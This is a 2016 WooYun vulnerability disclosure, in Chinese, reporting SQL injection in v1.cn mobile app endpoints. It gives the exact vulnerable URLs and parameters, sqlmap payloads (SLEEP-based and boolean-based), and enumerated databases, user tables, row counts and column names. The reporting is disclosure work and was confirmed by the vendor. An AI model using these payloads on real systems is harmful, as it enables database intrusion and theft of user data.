乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-04: 细节已通知厂商并且等待厂商处理中 2016-01-07: 厂商已经确认,细节仅向厂商公开 2016-01-17: 细节向核心白帽子及相关领域专家公开 2016-01-27: 细节向普通白帽子公开 2016-02-06: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
rt,还有别的注入点,不知道有没有跟前辈重复,所以都交了
第一个注入点
dynamic.app.m.v1.cn/www/dynamic.php?mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302&p=0
vid存在注入
sqlmap identified the following injection points with a total of 90 HTTP(s) requests:---Place: GETParameter: vid Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302; SELECT SLEEP(5)-- &p=0 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: mod=mob&ctl=videoComment&pcode=010110000&version=4.0&act=get&vid=14084302 AND SLEEP(5)&p=0---web application technology: PHP 5.4.4back-end DBMS: MySQL 5.0.11
第二个伪静态注入点
static.app.m.v1.cn/www/mod/mob/ctl/subscription/act/my/uid/8473817*/pcode/010110000/version/4.0.mindex.html
uid后星号位置存在注入
sqlmap identified the following injection points with a total of 38 HTTP(s) requests:---Place: URIParameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://static.app.m.v1.cn:80/www/mod/mob/ctl/subscription/act/my/uid/8473817 AND 2571=2571/pcode/010110000/version/4.0.mindex.html Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: http://static.app.m.v1.cn:80/www/mod/mob/ctl/subscription/act/my/uid/8473817 AND SLEEP(5)/pcode/010110000/version/4.0.mindex.html---web application technology: PHP 5.4.4back-end DBMS: MySQL 5.0.11
用户名及数据库
web application technology: PHP 5.4.4back-end DBMS: MySQL 5.0.11current user: '[email protected].%'current database: 'first_video'current user is DBA: False
列数据库
web application technology: PHP 5.4.4back-end DBMS: MySQL 5.0.11available databases [5]:[*] first_video[*] information_schema[*] test[*] v1_social[*] v1_transcode
143张表
web application technology: PHP 5.4.4back-end DBMS: MySQL 5.0.11select count(*) from information_schema.tables: '143'
这里我不列所有表了,因为是盲注,直接列user吧
web application technology: PHP 5.4.4back-end DBMS: MySQL 5.0.11select table_name from information_schema.tables where table_name like '%user%' [20]:[*] USER_PRIVILEGES[*] group_user[*] ms_user[*] ms_user_con[*] recommend_user_info[*] recommend_user_info_type[*] search_delta_user_info[*] search_total_user_info[*] sys_user[*] sys_user_role[*] user_account[*] user_account_change_log[*] user_channel[*] user_comments[*] user_focus_on[*] user_info[*] user_message[*] user_opinion[*] user_phone[*] user_setup
看了一下数据量,其实好像不如前辈的40W
web application technology: PHP 5.4.4back-end DBMS: MySQL 5.0.11Database: first_video+--------------------------+---------+| Table | Entries |+--------------------------+---------+| user_focus_on | 456093 || search_total_user_info | 32787 || user_info | 32782 || user_message | 26664 || user_account_change_log | 8569 || user_comments | 5286 || user_phone | 3423 || user_channel | 3070 || user_account | 689 || recommend_user_info | 282 || user_setup | 248 || user_opinion | 88 || sys_user_role | 8 || sys_user | 6 || recommend_user_info_type | 3 |+--------------------------+---------+
focus_on那个表没有什么内容,相关的可能是user_info中
PHP 5.4.4back-end DBMS: MySQL 5.0.11Database: first_videoTable: user_info[19 columns]+------------------+--------------+| Column | Type |+------------------+--------------+| background_img | varchar(200) || COMMENTS | int(11) || CREATE_TIME | varchar(40) || DETAIL | varchar(100) || EDITOR | int(11) || is_certification | tinyint(1) || ISFRIENDS | int(11) || LASTLOGIN_TIME | varchar(40) || nickname | varchar(20) || REGION | varchar(20) || SEX | varchar(4) || SHARE | int(11) || SORTCODE | int(11) || STATE | int(11) || USER_ID | int(11) || USER_IMG | varchar(200) || USER_NAME | varchar(20) || USER_TYPE | int(11) || VIDEOS | int(11) |+------------------+--------------+
参数过滤
危害等级:高
漏洞Rank:15
确认时间:2016-01-07 10:51
谢谢关注第一视频
暂无